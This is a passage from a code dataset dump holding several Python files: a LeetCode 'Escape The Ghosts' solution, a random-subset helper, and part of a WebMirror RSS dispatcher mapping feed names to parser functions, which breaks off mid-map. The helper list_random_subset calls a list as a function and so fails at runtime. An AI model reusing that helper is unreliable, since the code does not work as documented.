print(json.dumps(dict(title=d['title'], text=summary, category=category), ensure_ascii=False))\n","sub_path":"tools/extract_articles.py","file_name":"extract_articles.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"646721543","text":"# 789. Escape The Ghosts\nclass Solution:\n def escapeGhosts(self, ghosts, target):\n \"\"\"\n :type ghosts: List[List[int]]\n :type target: List[int]\n :rtype: bool\n \"\"\"\n target = (target[0], target[1])\n def checkGhost(p, d):\n for ghost in ghosts:\n if abs(p[0]-ghost[0])+abs(p[1]-ghost[1])<=d: return False\n return True\n p = (0,0)\n xDirection = 1 if target[0]>p[0] else -1\n yDirection = 1 if target[1]>p[1] else -1\n step = 0\n while p != target:\n if not checkGhost(p,step): return False\n if p[0] != target[0]:\n p = (p[0]+xDirection, p[1])\n else:\n p = (p[0], p[1]+yDirection)\n step += 1 \n if not checkGhost(p,step): return False \n return True\n","sub_path":"789/lc789-solution1.py","file_name":"lc789-solution1.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275322939","text":"import random as r\n\n\nclass Tester:\n test = 8\n\n\ndef list_random_subset(superset_list, out_max=0):\n \"\"\"\n Returns a list by taking a random, non-overlapping subset from .\n\n :param superset_list: List to take subset from\n :param out_max: Maximum size oft he output list\n :return: A random subset of \n \"\"\"\n\n if out_max == 0:\n return superset_list\n\n index_list = [i for i in range(len(superset_list))]\n new_list = []\n\n while len(index_list) > 0 and len(new_list) < out_max:\n index = index_list(r.randrange(0, len(index_list)))\n new_list.append(superset_list[index])\n index_list.remove(index)\n\n return new_list\n\n\ndef hello():\n print(\"Hello\")","sub_path":"tobias_py/basic/random/rand.py","file_name":"rand.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"61517794","text":"\n#!/usr/bin/python\n# from profilehooks import profile\nimport urllib.parse\nimport json\nimport traceback\nimport WebMirror.OutputFilters.util.feedNameLut as feedNameLut\n\n\nimport WebMirror.OutputFilters.rss.ParserFuncs_a_g as pfuncs_a_g\nimport WebMirror.OutputFilters.rss.ParserFuncs_h_n as pfuncs_h_n\nimport WebMirror.OutputFilters.rss.ParserFuncs_o_u as pfuncs_o_u\nimport WebMirror.OutputFilters.rss.ParserFuncs_stub as pfuncs_stub\nimport WebMirror.OutputFilters.rss.ParserFuncs_v_other as pfuncs_v_other\n\nfrom WebMirror.OutputFilters.util.TitleParsers import extractVolChapterFragmentPostfix\n\nimport WebMirror.OutputFilters.FilterBase\nimport WebMirror.rules\nimport flags\n\nskip_filter = [\n\t\"www.baka-tsuki.org\",\n\t\"re-monster.wikia.com\",\n\t'inmydaydreams.com',\n\t'www.fanfiction.net',\n\t'www.booksie.com',\n\t'www.booksiesilk.com',\n\t'www.fictionpress.com',\n\t'storiesonline.net',\n\t'www.fictionmania.tv',\n\t'pokegirls.org',\n\t'www.asstr.org',\n\t'www.mcstories.com',\n\t'www.novelupdates.com',\n\t'40pics.com',\n\n]\n\n\n\nclass DataParser(WebMirror.OutputFilters.FilterBase.FilterBase):\n\n\tamqpint = None\n\tamqp_connect = True\n\n\tdef __init__(self, transfer=True, debug_print=False, write_debug=False, **kwargs):\n\t\tsuper().__init__(**kwargs)\n\n\t\tself.dbg_print = debug_print\n\t\tself.transfer = transfer\n\t\tself.names = set()\n\n\t\tself.write_debug = write_debug\n\n\t####################################################################################################################################################\n\t####################################################################################################################################################\n\t##\n\t## Dispatcher\n\t##\n\t####################################################################################################################################################\n\t####################################################################################################################################################\n\n\n\tdef dispatchRelease(self, item):\n\n\t\tret = False\n\n\t\tfuncMap = {\n\n\t\t\t\t'A0132' : pfuncs_a_g.extractA0132,\n\t\t\t\t'Adamantine Dragon in the Crystal World' : pfuncs_a_g.extractAdamantineDragonintheCrystalWorld,\n\t\t\t\t'AFlappyTeddyBird' : pfuncs_a_g.extractAFlappyTeddyBird,\n\t\t\t\t'A Grey World' : pfuncs_a_g.extractAGreyWorld,\n\t\t\t\t'Albert Kenoreijou' : pfuncs_a_g.extractAlbertKenoreijou,\n\t\t\t\t'Alcsel Translations' : pfuncs_a_g.extractAlcsel,\n\t\t\t\t'Alice Translations' : pfuncs_a_g.extractAliceTranslations,\n\t\t\t\t'alicetranslations.wordpress.com' : pfuncs_a_g.extractAlicetranslations,\n\t\t\t\t'All\\'s Fair In Love & War' : pfuncs_a_g.extractAllsFairInLoveWar,\n\t\t\t\t'Altoroc Translations' : pfuncs_a_g.extractAltorocTranslations,\n\t\t\t\t'Alyschu & Co' : pfuncs_a_g.extractAlyschuCo,\n\t\t\t\t'Amery Edge' : pfuncs_a_g.extractAmeryEdge,\n\t\t\t\t'Anathema Serial' : pfuncs_a_g.extractAnathema,\n\t\t\t\t'Andrew9495\\'s MTL corner' : pfuncs_a_g.extractAndrew9495,\n\t\t\t\t'ヾ(。 ̄□ ̄)ツ' : pfuncs_a_g.extractAngry,\n\t\t\t\t'Anne And Cindy' : pfuncs_a_g.extractAnneAndCindy,\n\t\t\t\t'Anon Empire' : pfuncs_a_g.extractAnonEmpire,\n\t\t\t\t'Another Parallel World' : pfuncs_a_g.extractAnotherParallelWorld,\n\t\t\t\t'Another World Translations' : pfuncs_a_g.extractAnotherWorldTranslations,\n\t\t\t\t'Aori Translations' : pfuncs_a_g.extractAoriTranslations,\n\t\t\t\t'A Pearly View' : pfuncs_a_g.extractAPearlyView,\n\t\t\t\t'Aquarilas\\' Scenario' : pfuncs_a_g.extractAquarilasScenario,\n\t\t\t\t'Aqua Scans' : pfuncs_a_g.extractAquaScans,\n\t\t\t\t'Aran Translations' : pfuncs_a_g.extractAranTranslations,\n\t\t\t\t'Archivity' : pfuncs_a_g.extractArchivity,\n\t\t\t\t'Ares Novels' : pfuncs_a_g.extractAresNovels,\n\t\t\t\t'Ark Machine Translations' : pfuncs_a_g.extractArkMachineTranslations,\n\t\t\t\t'asd398' : pfuncs_a_g.extractAsd398,\n\t\t\t\t'AsherahBlue\\'s Notebook' : pfuncs_a_g.extractAsherahBlue,\n\t\t\t\t'Aten Translations' : pfuncs_a_g.extractAtenTranslations,\n\t\t\t\t'A Translator\\'s Ramblings' : pfuncs_a_g.extractATranslatorsRamblings,\n\t\t\t\t'A traveler\\'s translations.' : pfuncs_a_g.extractATravelersTranslations,\n\t\t\t\t'Avert Translations' : pfuncs_a_g.extractAvert,\n\t\t\t\t'Ayax World' : pfuncs_a_g.extractAyaxWorld,\n\t\t\t\t'Azure Sky Translation' : pfuncs_a_g.extractAzureSky,\n\t\t\t\t'Azurro 4 Cielo' : pfuncs_a_g.extractAzurro,\n\t\t\t\t'Bad Translation' : pfuncs_a_g.extractBadTranslation,\n\t\t\t\t'Baka Dogeza Translation' : pfuncs_a_g.extractBakaDogeza,\n\t\t\t\t'Baka Pervert' : pfuncs_a_g.extractBakaPervert,\n\t\t\t\t\"'Ball'-Kicking Gang Boss\" : pfuncs_a_g.extractBallKickingGangBoss,\n\t\t\t\t'The Bathrobe Knight' : pfuncs_a_g.extractBathrobeKnight,\n\t\t\t\t'Bayabusco Translation' : pfuncs_a_g.extractBayabuscoTranslation,\n\t\t\t\t'Bcat00 Translation' : pfuncs_a_g.extractBcat00,\n\t\t\t\t'Bear Bear Translations' : pfuncs_a_g.extractBearBearTranslations,\n\t\t\t\t'Beehugger' : pfuncs_a_g.extractBeehugger,\n\t\t\t\t'The Beginning After The End' : pfuncs_a_g.extractBeginningAfterTheEnd,\n\t\t\t\t'Berseker Translations' : pfuncs_a_g.extractBersekerTranslations,\n\t\t\t\t'BeRsErk Translations' : pfuncs_a_g.extractBeRsErkTranslations,\n\t\t\t\t'Bijinsans' : pfuncs_a_g.extractBijinsans,\n\t\t\t\t'Binggo&Corp' : pfuncs_a_g.extractBinggoCorp,\n\t\t\t\t'Binhjamin' : pfuncs_a_g.extractBinhjamin,\n\t\t\t\t'Blade of Hearts' : pfuncs_a_g.extractBladeOfHearts,\n\t\t\t\t'Blublub' : pfuncs_a_g.extractBlublub,\n\t\t\t\t'Bluefire Translations' : pfuncs_a_g.extractBluefireTranslations,\n\t\t\t\t'Blue Silver Translations' : pfuncs_a_g.extractBlueSilverTranslations,\n\t\t\t\t'Books Movies and Beyond' : pfuncs_a_g.extractBooksMoviesAndBeyond,\n\t\t\t\t'Bruin Translation' : pfuncs_a_g.extractBruinTranslation,\n\t\t\t\t'Bu Bu Jing Xin Translation' : pfuncs_a_g.extractBuBuJingXinTrans,\n\t\t\t\t'Burei Dan Works' : pfuncs_a_g.extractBureiDan,\n\t\t\t\t'Calico x Tabby' : pfuncs_a_g.extractCalicoxTabby,\n\t\t\t\t'Cas Project Site' : pfuncs_a_g.extractCasProjectSite,\n\t\t\t\t'Cat Scans' : pfuncs_a_g.extractCatScans,\n\t\t\t\t\"Cautr's\" : pfuncs_a_g.extractCautrs,\n\t\t\t\t'CaveScans' : pfuncs_a_g.extractCaveScans,\n\t\t\t\t'cavescans.com' : pfuncs_a_g.extractCaveScans,\n\t\t\t\t'C.E. Light Novel Translations' : pfuncs_a_g.extractCeLn,\n\t\t\t\t'Ceruleonice Translations' : pfuncs_a_g.extractCeruleonice,\n\t\t\t\t'Cheddar!' : pfuncs_a_g.extractCheddar,\n\t\t\t\t'Chinese BL Translations' : pfuncs_a_g.extractChineseBLTranslations,\n\t\t\t\t'Chinese Weaboo Translations' : pfuncs_a_g.extractChineseWeabooTranslations,\n\t\t\t\t'Chrona Zero' : pfuncs_a_g.extractChronaZero,\n\t\t\t\t'Chronon Translations' : pfuncs_a_g.extractChrononTranslations,\n\t\t\t\t'ChubbyCheeks' : pfuncs_a_g.extractChubbyCheeks,\n\t\t\t\t'Circle of Shards' : pfuncs_a_g.extractCircleofShards,\n\t\t\t\t'Circus Translations' : pfuncs_a_g.extractCircusTranslations,\n\t\t\t\t'Clicky Click Translation' : pfuncs_a_g.extractClicky,\n\t\t\t\t'Cloud Manor' : pfuncs_a_g.extractCloudManor,\n\t\t\t\t'Cloud Translations' : pfuncs_a_g.extractCloudTranslations,\n\t\t\t\t'Clover\\'s Nook' : pfuncs_a_g.extractCloversNook,\n\t\t\t\t'Translated by a Clown' : pfuncs_a_g.extractClownTrans,\n\t\t\t\t'The C-Novel Project' : pfuncs_a_g.extractCNovelProj,\n\t\t\t\t'C Novels 2 C' : pfuncs_a_g.extractCNovels2C,\n\t\t\t\t'C-Novel Tranlations…' : pfuncs_a_g.extractCNovelTranlations,\n\t\t\t\t'Code-Zero\\'s Blog' : pfuncs_a_g.extractCodeZerosBlog,\n\t\t\t\t'CookiePasta' : pfuncs_a_g.extractCookiePasta,\n\t\t\t\t'CookiePasta Translations' : pfuncs_a_g.extractCookiePasta,\n\t\t\t\t'Cosmic Translation' : pfuncs_a_g.extractCosmicTranslation,\n\t\t\t\t'Crack of Dawn Translations' : pfuncs_a_g.extractCrackofDawnTranslations,\n\t\t\t\t'Crappy Machine Translation' : pfuncs_a_g.extractCrappyMachineTranslation,\n\t\t\t\t'Crazy for HE Novels' : pfuncs_a_g.extractCrazyForHENovels,\n\t\t\t\t'tiffybook.com' : pfuncs_a_g.extractCrazyForHENovels,\n\t\t\t\t'CrystalRainDescends' : pfuncs_a_g.extractCrystalRainDescends,\n\t\t\t\t'CtrlAlcalá' : pfuncs_a_g.extractCtrlAlcala,\n\t\t\t\t'Currently TLing [Bu ni Mi]' : pfuncs_a_g.extractCurrentlyTLingBuniMi,\n\t\t\t\t'DadIsHero Fan Translations' : pfuncs_a_g.extractDadIsHeroFanTranslations,\n\t\t\t\t'Daily-Dallying' : pfuncs_a_g.extractDailyDallying,\n\t\t\t\t'Dao Seeker Blog' : pfuncs_a_g.extractDaoSeekerBlog,\n\t\t\t\t'A fish once said this to me' : pfuncs_a_g.extractDarkFish,\n\t\t\t\t'Dark Translations' : pfuncs_a_g.extractDarkTranslations,\n\t\t\t\t'Dawning Howls' : pfuncs_a_g.extractDawningHowls,\n\t\t\t\t'Deadly Forgotten Legends' : pfuncs_a_g.extractDeadlyForgottenLegends,\n\t\t\t\t'Defan\\'s Translations' : pfuncs_a_g.extractDefansTranslations,\n\t\t\t\t'Defiring' : pfuncs_a_g.extractDefiring,\n\t\t\t\t'Dekinai Diary' : pfuncs_a_g.extractDekinaiDiary,\n\t\t\t\t'Delicious Translations' : pfuncs_a_g.extractDeliciousTranslations,\n\t\t\t\t'Demerith Translation' : pfuncs_a_g.extractDemerithTranslation,\n\t\t\t\t'Descent Subs' : pfuncs_a_g.extractDescentSubs,\n\t\t\t\t'Dewey Night Unrolls' : pfuncs_a_g.extractDeweyNightUnrolls,\n\t\t\t\t'DHH Translations' : pfuncs_a_g.extractDHHTranslations,\n\t\t\t\t'Disappointing Translations' : pfuncs_a_g.extractDisappointingTranslations,\n\t\t\t\t'Distracted Chinese' : pfuncs_a_g.extractDistractedChinese,\n\t\t\t\t'Distracted Translations' : pfuncs_a_g.extractDistractedTranslations,\n\t\t\t\t'Diwasteman' : pfuncs_a_g.extractDiwasteman,\n\t\t\t\t'DokuHana Translations' : pfuncs_a_g.extractDokuHanaTranslations,\n\t\t\t\t'Dorayakiz' : pfuncs_a_g.extractDorayakiz,\n\t\t\t\t\"DOW's Translations\" : pfuncs_a_g.extractDOWsTranslations,\n\t\t\t\t'DragomirCM' : pfuncs_a_g.extractDragomirCM,\n\t\t\t\t'Dragon MT' : pfuncs_a_g.extractDragonMT,\n\t\t\t\t'Dramas, Books & Tea' : pfuncs_a_g.extractDramasBooksTea,\n\t\t\t\t'Dreadful Decoding' : pfuncs_a_g.extractDreadfulDecoding,\n\t\t\t\t'Dream Avenue' : pfuncs_a_g.extractDreamAvenue,\n\t\t\t\t\"Dreamless Window's translation\" : pfuncs_a_g.extractDreamlessWindowsTranslation,\n\t\t\t\t'Dreams of Jianghu' : pfuncs_a_g.extractDreamsOfJianghu,\n\t\t\t\t'Ducky\\'s English Translations' : pfuncs_a_g.extractDuckysEnglishTranslations,\n\t\t\t\t'Duran Daru Translation' : pfuncs_a_g.extractDuranDaruTranslation,\n\t\t\t\t'Durasama' : pfuncs_a_g.extractDurasama,\n\t\t\t\t'Dynamis Gaul Light Novel' : pfuncs_a_g.extractDynamisGaul,\n\t\t\t\t'EccentricTranslations' : pfuncs_a_g.extractEccentricTranslations,\n\t\t\t\t'EC Webnovel' : pfuncs_a_g.extractECWebnovel,\n\t\t\t\t'ELYSION Translation' : pfuncs_a_g.extractELYSIONTranslation,\n\t\t\t\t'Emergency Exit\\'s Release Blog' : pfuncs_a_g.extractEmergencyExitsReleaseBlog,\n\t\t\t\t'Emruyshit Translations' : pfuncs_a_g.extractEmruyshitTranslations,\n\t\t\t\t'EndKun' : pfuncs_a_g.extractEndKun,\n\t\t\t\t'End Online Novel' : pfuncs_a_g.extractEndOnline,\n\t\t\t\t'Ensig\\'s Writings' : pfuncs_a_g.extractEnsigsWritings,\n\t\t\t\t'Ensj Translations' : pfuncs_a_g.extractEnsjTranslations,\n\t\t\t\t'Ente38 translations' : pfuncs_a_g.extractEnte38translations,\n\t\t\t\t'EnTruce Translations' : pfuncs_a_g.extractEnTruceTranslations,\n\t\t\t\t'Epithetic' : pfuncs_a_g.extractEpithetic,\n\t\t\t\t'Epyon Translations' : pfuncs_a_g.extractEpyonTranslations,\n\t\t\t\t'Ero Light Novel Translations' : pfuncs_a_g.extractEroLightNovelTranslations,\n\t\t\t\t'Eros Workshop' : pfuncs_a_g.extractErosWorkshop,\n\t\t\t\t'eternalpath.net' : pfuncs_a_g.extractEternalpath,\n\t\t\t\t'Etheria Translations' : pfuncs_a_g.extractEtheriaTranslations,\n\t\t\t\t'Eugene Rain' : pfuncs_a_g.extractEugeneRain,\n\t\t\t\t\"Evida's Indo Romance\" : pfuncs_a_g.extractEvidasIndoRomance,\n\t\t\t\t'Extant Visions' : pfuncs_a_g.extractExtantVisions,\n\t\t\t\t'Eye of Adventure ' : pfuncs_a_g.extractEyeofAdventure,\n\t\t\t\t'EZ Translations' : pfuncs_a_g.extractEZTranslations,\n\t\t\t\t'Fake typist' : pfuncs_a_g.extractFaketypist,\n\t\t\t\t'Fak Translations' : pfuncs_a_g.extractFakTranslations,\n\t\t\t\t'Falamar Translation' : pfuncs_a_g.extractFalamarTranslation,\n\t\t\t\t'Falinmer' : pfuncs_a_g.extractFalinmer,\n\t\t\t\t'Fanatical' : pfuncs_a_g.extractFanatical,\n\t\t\t\t'FeedProxy' : pfuncs_a_g.extractFeedProxy,\n\t\t\t\t'fgiLaN translations' : pfuncs_a_g.extractfgiLaNTranslations,\n\t\t\t\t'Fighting Dreamers Scanlations' : pfuncs_a_g.extractFightingDreamersScanlations,\n\t\t\t\t'Firebird\\'s Nest' : pfuncs_a_g.extractFirebirdsNest,\n\t\t\t\t'Five Star Specialists' : pfuncs_a_g.extractFiveStar,\n\t\t\t\t'Flicker Hero' : pfuncs_a_g.extractFlickerHero,\n\t\t\t\t'Flower Bridge Too' : pfuncs_a_g.extractFlowerBridgeToo,\n\t\t\t\t'Forgetful Dreamer' : pfuncs_a_g.extractForgetfulDreamer,\n\t\t\t\t'Forgotten Conqueror' : pfuncs_a_g.extractForgottenConqueror,\n\t\t\t\t'/' : pfuncs_a_g.extractForwardSlash,\n\t\t\t\t'Frostfire 10' : pfuncs_a_g.extractFrostfire10,\n\t\t\t\t'Fudge Translations' : pfuncs_a_g.extractFudgeTranslations,\n\t\t\t\t'Fung Shen' : pfuncs_a_g.extractFungShen,\n\t\t\t\t'Fuzion Life' : pfuncs_a_g.extractFuzionLife,\n\t\t\t\t'Gaochao Translations' : pfuncs_a_g.extractGaochaoTranslations,\n\t\t\t\t'Gargoyle Web Serial' : pfuncs_a_g.extractGargoyleWebSerial,\n\t\t\t\t'Gila Translation Monster' : pfuncs_a_g.extractGilaTranslation,\n\t\t\t\t'Giraffe Corps' : pfuncs_a_g.extractGiraffe,\n\t\t\t\t'[G.O] Chronicles' : pfuncs_a_g.extractGOChronicles,\n\t\t\t\t'Goddess! Grant Me a Girlfriend!!' : pfuncs_a_g.extractGoddessGrantMeaGirlfriend,\n\t\t\t\t'Gravity Tales' : pfuncs_a_g.extractGravityTranslation,\n\t\t\t\t'GrimdarkZ Translations' : pfuncs_a_g.extractGrimdarkZTranslations,\n\t\t\t\t'Grow with Me' : pfuncs_a_g.extractGrowWithMe,\n\t\t\t\t'Grow with me' : pfuncs_a_g.extractGrowWithMe,\n\t\t\t\t'guhehe.TRANSLATIONS' : pfuncs_a_g.extractGuhehe,\n\t\t\t\t'Guro Translation' : pfuncs_a_g.extractGuroTranslation,\n\t\t\t\t'Hajiko translation' : pfuncs_h_n.extractHajiko,\n\t\t\t\t'Hamster428' : pfuncs_h_n.extractHamster428,\n\t\t\t\t'HaruPARTY' : pfuncs_h_n.extractHaruPARTY,\n\t\t\t\t'Heart Crusade Scans' : pfuncs_h_n.extractHeartCrusadeScans,\n\t\t\t\t'Helidwarf' : pfuncs_h_n.extractHelidwarf,\n\t\t\t\t'Hello Translations' : pfuncs_h_n.extractHelloTranslations,\n\t\t\t\t'Hellping' : pfuncs_h_n.extractHellping,\n\t\t\t\t'Hell Yeah 524' : pfuncs_h_n.extractHellYeah524,\n\t\t\t\t'Hendricksen-sama' : pfuncs_h_n.extractHendricksensama,\n\t\t\t\t'Henouji Translation' : pfuncs_h_n.extractHenoujiTranslation,\n\t\t\t\t'Heroic Legend of Arslan Translations' : pfuncs_h_n.extractHeroicLegendOfArslanTranslations,\n\t\t\t\t'Heroic Novels' : pfuncs_h_n.extractHeroicNovels,\n\t\t\t\t'Hikki no Mori Translations' : pfuncs_h_n.extractHikkinoMoriTranslations,\n\t\t\t\t'Hokage Translations' : pfuncs_h_n.extractHokageTrans,\n\t\t\t\t'Hold \\'X\\' and Click' : pfuncs_h_n.extractHoldX,\n\t\t\t\t\"Hon'yaku\" : pfuncs_h_n.extractHonyaku,\n\t\t\t\t'Hot Cocoa Translations' : pfuncs_h_n.extractHotCocoa,\n\t\t\t\t\"Hugs & Love\" : pfuncs_h_n.extractHugsAndLove,\n\t\t\t\t'Hyorinmaru Blog' : pfuncs_h_n.extractHyorinmaruBlog,\n\t\t\t\t'Hyorinmaru' : pfuncs_h_n.extractHyorinmaruBlog,\n\t\t\t\t'Imoutolicious Light Novel Translations' : pfuncs_h_n.extractImoutolicious,\n\t\t\t\t'Infinite Novel Translations' : pfuncs_h_n.extractInfiniteNovelTranslations,\n\t\t\t\t'Infinite Translations' : pfuncs_h_n.extractInfiniteTranslations,\n\t\t\t\t'IntenseDesSugar' : pfuncs_h_n.extractIntenseDesSugar,\n\t\t\t\t'Isekai Mahou Translations!' : pfuncs_h_n.extractIsekaiMahou,\n\t\t\t\t'Isekai Soul-Cyborg Translations' : pfuncs_h_n.extractIsekaiTranslation,\n\t\t\t\t'Reigokai: Isekai Translations' : pfuncs_h_n.extractIsekaiTranslations,\n\t\t\t\t'Isolarium' : pfuncs_h_n.extractIsolarium,\n\t\t\t\t'Istian\\'s Workshop' : pfuncs_h_n.extractIstiansWorkshop,\n\t\t\t\t'Iterations within a Thought-Eclipse' : pfuncs_h_n.extractIterations,\n\t\t\t\t'itranslateln' : pfuncs_h_n.extractItranslateln,\n\t\t\t\t'izra709 | B Group no Shounen Translations' : pfuncs_h_n.extractIzra709,\n\t\t\t\t'Jagaimo' : pfuncs_h_n.extractJagaimo,\n\t\t\t\t'Januke Translations' : pfuncs_h_n.extractJanukeTranslations,\n\t\t\t\t'Japtem' : pfuncs_h_n.extractJaptem,\n\t\t\t\t'JawzTranslations' : pfuncs_h_n.extractJawzTranslations,\n\t\t\t\t'Joeglen\\'s Translation Space' : pfuncs_h_n.extractJoeglensTranslationSpace,\n\t\t\t\t'Joie de Vivre' : pfuncs_h_n.extractJoiedeVivre,\n\t\t\t\t'Jun Juntianxia' : pfuncs_h_n.extractJunJuntianxia,\n\t\t\t\t'Kaezar Translations' : pfuncs_h_n.extractKaezar,\n\t\t\t\t'Kahoim Translations' : pfuncs_h_n.extractKahoim,\n\t\t\t\t'Kakkokari' : pfuncs_h_n.extractKakkokari,\n\t\t\t\t'Kami Translation' : pfuncs_h_n.extractKamiTranslation,\n\t\t\t\t'Kawaii Daikon' : pfuncs_h_n.extractKawaiiDaikon,\n\t\t\t\t'Kedelu' : pfuncs_h_n.extractKedelu,\n\t\t\t\t'Kerambit\\'s Incisions' : pfuncs_h_n.extractKerambit,\n\t\t\t\t'Keyo Translations' : pfuncs_h_n.extractKeyoTranslations,\n\t\t\t\t'King Jaahn\\'s Subjects' : pfuncs_h_n.extractKingJaahn,\n\t\t\t\t'Kiri Leaves' : pfuncs_h_n.extractKiri,\n\t\t\t\t'Kiriko Translations' : pfuncs_h_n.extractKirikoTranslations,\n\t\t\t\t'Kisato\\'s MLTs' : pfuncs_h_n.extractKisatosMLTs,\n\t\t\t\t'Knokkro Translations' : pfuncs_h_n.extractKnokkroTranslations,\n\t\t\t\t'KN Translation' : pfuncs_h_n.extractKNTranslation,\n\t\t\t\t'Blazing Translations' : pfuncs_h_n.extractKnW,\n\t\t\t\t'CapsUsingShift Tl' : pfuncs_h_n.extractKnW,\n\t\t\t\t'Insignia Pierce' : pfuncs_h_n.extractKnW,\n\t\t\t\t'Konjiki no Wordmaster' : pfuncs_h_n.extractKnW,\n\t\t\t\t'Loliquent' : pfuncs_h_n.extractKnW,\n\t\t\t\t'Pummels Translations' : pfuncs_h_n.extractKnW,\n\t\t\t\t'KobatoChanDaiSukiScan' : pfuncs_h_n.extractKobatoChanDaiSukiScan,\n\t\t\t\t'Kokuma Translations' : pfuncs_h_n.extractKokumaTranslations,\n\t\t\t\t'KONDEE Translations' : pfuncs_h_n.extractKONDEETranslations,\n\t\t\t\t'Konobuta' : pfuncs_h_n.extractKonobuta,\n\t\t\t\t'Koong Koong Translations' : pfuncs_h_n.extractKoongKoongTranslations,\n\t\t\t\t'Korean Novel Translations' : pfuncs_h_n.extractKoreanNovelTrans,\n\t\t\t\t'Kore Yori Hachidori' : pfuncs_h_n.extractKoreYoriHachidori,\n\t\t\t\t'Krytyk\\'s Translations' : pfuncs_h_n.extractKrytyksTranslations,\n\t\t\t\t'Kuma Otou' : pfuncs_h_n.extractKumaOtou,\n\t\t\t\t'Kuro Translations' : pfuncs_h_n.extractKuroTranslations,\n\t\t\t\t'Kurotsuki Novel' : pfuncs_h_n.extractKurotsukiNovel,\n\t\t\t\t'Kyakka' : pfuncs_h_n.extractKyakka,\n\t\t\t\t'Kyakka Translations' : pfuncs_h_n.extractKyakkaTranslations,\n\t\t\t\t'kyoptionslibrary.blogspot.com' : pfuncs_h_n.extractKyoptionslibrary,\n\t\t\t\t'L2M' : pfuncs_h_n.extractL2M,\n\t\t\t\t'Larvyde' : pfuncs_h_n.extractLarvyde,\n\t\t\t\t'Lascivious Imouto' : pfuncs_h_n.extractLasciviousImouto,\n\t\t\t\t'Lastvoice Translator' : pfuncs_h_n.extractLastvoiceTranslator,\n\t\t\t\t'Layzisheep' : pfuncs_h_n.extractLayzisheep,\n\t\t\t\t'Legend of Galactic Heroes Translation Project' : pfuncs_h_n.extractLegendofGalacticHeroes,\n\t\t\t\t'Lickymee Translations' : pfuncs_h_n.extractLickymeeTranslations,\n\t\t\t\t'Light Novels Translations' : pfuncs_h_n.extractLightNovelsTranslations,\n\t\t\t\t'Light Novel translations' : pfuncs_h_n.extractLightNoveltranslations,\n\t\t\t\t'Lil\\' Bliss Novels' : pfuncs_h_n.extractLilBlissNovels,\n\t\t\t\t'Lingson\\'s Translations' : pfuncs_h_n.extractLingson,\n\t\t\t\t'Ling Translates Sometimes' : pfuncs_h_n.extractLingTranslatesSometimes,\n\t\t\t\t'Linked Translations' : pfuncs_h_n.extractLinkedTranslations,\n\t\t\t\t'Little Novel Translation' : pfuncs_h_n.extractLittleNovelTranslation,\n\t\t\t\t'LittleShanks Translations' : pfuncs_h_n.extractLittleShanksTranslations,\n\t\t\t\t'Little Translations' : pfuncs_h_n.extractLittleTranslations,\n\t\t\t\t'Lizard Translations' : pfuncs_h_n.extractLizardTranslations,\n\t\t\t\t'LMS Machine Translations' : pfuncs_h_n.extractLMSMachineTranslations,\n\t\t\t\t'Ln Addiction' : pfuncs_h_n.extractLnAddiction,\n\t\t\t\t'Lohithbb TLs' : pfuncs_h_n.extractLohithbbTLs,\n\t\t\t\t'Loiterous' : pfuncs_h_n.extractLoiterous,\n\t\t\t\t'Lonahora' : pfuncs_h_n.extractLonahora,\n\t\t\t\t'LorCromwell' : pfuncs_h_n.extractLorCromwell,\n\t\t\t\t'LordofScrubs' : pfuncs_h_n.extractLordofScrubs,\n\t\t\t\t'Lost in Translation' : pfuncs_h_n.extractLostInTranslation,\n\t\t\t\t'Luen Translations' : pfuncs_h_n.extractLuenTranslations,\n\t\t\t\t'Lunaris' : pfuncs_h_n.extractLunaris,\n\t\t\t\t'Lunate' : pfuncs_h_n.extractLunate,\n\t\t\t\t'LygarTranslations' : pfuncs_h_n.extractLygarTranslations,\n\t\t\t\t'Lylis Translations' : pfuncs_h_n.extractLylisTranslations,\n\t\t\t\t'Lynfamily' : pfuncs_h_n.extractLynfamily,\n\t\t\t\t'Lypheon Machine Translation' : pfuncs_h_n.extractLypheonMachineTranslation,\n\t\t\t\t'Machine Sliced Bread' : pfuncs_h_n.extractMachineSlicedBread,\n\t\t\t\t'Madao Translations' : pfuncs_h_n.extractMadaoTranslations,\n\t\t\t\t'MadoSpicy TL' : pfuncs_h_n.extractMadoSpicy,\n\t\t\t\t'Mahou Koukoku' : pfuncs_h_n.extractMahouKoukoku,\n\t\t\t\t'Mahoutsuki Translation' : pfuncs_h_n.extractMahoutsuki,\n\t\t\t\t'Makina Translations' : pfuncs_h_n.extractMakinaTranslations,\n\t\t\t\t'Mana Tank Magus' : pfuncs_h_n.extractManaTankMagus,\n\t\t\t\t'Manga0205 Translations' : pfuncs_h_n.extractManga0205Translations,\n\t\t\t\t'Maou na Anoko to murabito a' : pfuncs_h_n.extractMaounaAnokotomurabitoa,\n\t\t\t\t'VaanCruze' : pfuncs_h_n.extractMaouTheYuusha,\n\t\t\t\t'Martial God Translator' : pfuncs_h_n.extractMartialGodTranslator,\n\t\t\t\t'Mecha Mushroom Translations' : pfuncs_h_n.extractMechaMushroom,\n\t\t\t\t'Yet Another Translation Site' : pfuncs_h_n.extractMiaomix539,\n\t\t\t\t'Midnight Translation Blog' : pfuncs_h_n.extractMidnightTranslationBlog,\n\t\t\t\t'Mike777ac' : pfuncs_h_n.extractMike777ac,\n\t\t\t\t'Mnemeaa' : pfuncs_h_n.extractMnemeaa,\n\t\t\t\t'Mojo Translations' : pfuncs_h_n.extractMojoTranslations,\n\t\t\t\t\"Monkoto's Translations\" : pfuncs_h_n.extractMonkotosTranslations,\n\t\t\t\t'Monk Translation' : pfuncs_h_n.extractMonkTranslation,\n\t\t\t\t'Moon Bunny Cafe' : pfuncs_h_n.extractMoonBunnyCafe,\n\t\t\t\t'Morrighan Sucks' : pfuncs_h_n.extractMorrighanSucks,\n\t\t\t\t'Mousou Haven' : pfuncs_h_n.extractMousouHaven,\n\t\t\t\t'mousou-haven.com' : pfuncs_h_n.extractMousouhaven,\n\t\t\t\t'MTLCrap' : pfuncs_h_n.extractMTLCrap,\n\t\t\t\t'My Purple World' : pfuncs_h_n.extractMyPurpleWorld,\n\t\t\t\t'Mystique Translations' : pfuncs_h_n.extractMystiqueTranslations,\n\t\t\t\t'Mythical Pagoda' : pfuncs_h_n.extractMythicalPagoda,\n\t\t\t\t'N00b Translations' : 